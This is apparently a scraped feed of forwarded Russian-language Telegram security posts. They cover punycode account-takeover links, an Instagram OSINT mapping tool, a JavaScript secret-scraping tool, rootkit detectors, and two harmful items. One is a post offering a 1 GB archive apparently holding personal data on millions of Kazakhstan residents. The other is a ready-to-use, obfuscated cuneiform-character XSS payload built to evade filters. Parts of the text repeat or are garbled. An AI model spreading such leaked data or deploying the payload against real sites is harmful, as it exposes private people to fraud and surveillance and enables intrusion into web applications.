Forwarded from Похек
Интересное видео с демонстрацией Account Takeover через punycode
https://youtu.be/Cj1sOFHDClM
А также статья с примером, как багхантер получил баунти за такую багу
https://infosecwriteups.com/the-most-underrated-0-click-account-takeover-using-punycode-idn-attacks-c0afdb74a3dc
🌚 @poxek
https://youtu.be/Cj1sOFHDClM
А также статья с примером, как багхантер получил баунти за такую багу
https://infosecwriteups.com/the-most-underrated-0-click-account-takeover-using-punycode-idn-attacks-c0afdb74a3dc
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Сертификат безопасности
Жители Казахстан 16kk.7z
1 GB
По просьбам трудящихся выкладываю архивный файл "
Пароль:
Жители Казахстан 16kk.csv"Пароль:
@qcakzForwarded from OSINT
Инструмент с открытым исходным кодом, разработанный специально для OSINT-анализа данных из Instagram*. Позволяет визуализировать связи между аккаунтами, хэштегами, местоположениями и другими сущностями.
Удобный интерфейс, гибкость и визуальная подача делают Osintgraph интересным решением для анализа цифровых следов в Instagram*.
*Запрещен в России и принадлежит компании Meta, признанной экстремистской и запрещённой на территории РФ
⤷ Ссылка на сервис
@osintru
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Cyber Detective
FAKJS
Super fast #go tool that finds different sensitive data in JavaScript files:
- API keys, tokens, etc.
- Internal or hidden endpoints
- Configuration data
- Potential indicators of exposed logic or backend connections
https://github.com/thd3r/fakjs
Super fast #go tool that finds different sensitive data in JavaScript files:
- API keys, tokens, etc.
- Internal or hidden endpoints
- Configuration data
- Potential indicators of exposed logic or backend connections
https://github.com/thd3r/fakjs
Forwarded from Fly Dragon Fly
XSS payload, Cuneiform-alphabet based
"><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()"Please open Telegram to view this post
VIEW IN TELEGRAM
https://www.chkrootkit.org/
https://github.com/Tripwire/tripwire-open-source/
https://aide.github.io/
https://sourceforge.net/projects/aide/
https://github.com/Tripwire/tripwire-open-source/
https://aide.github.io/
https://sourceforge.net/projects/aide/
www.chkrootkit.org
chkrootkit -- locally checks for signs of a rootkit
chkrootkit locally checks for signs of a rootkit. Includes ifpromisc.c to check if the interface is in promiscuous mode, chklastlog.c and chkwtmp.c to check for lastlog and wtmp deletions and chkproc.c for signs of LKM trojans.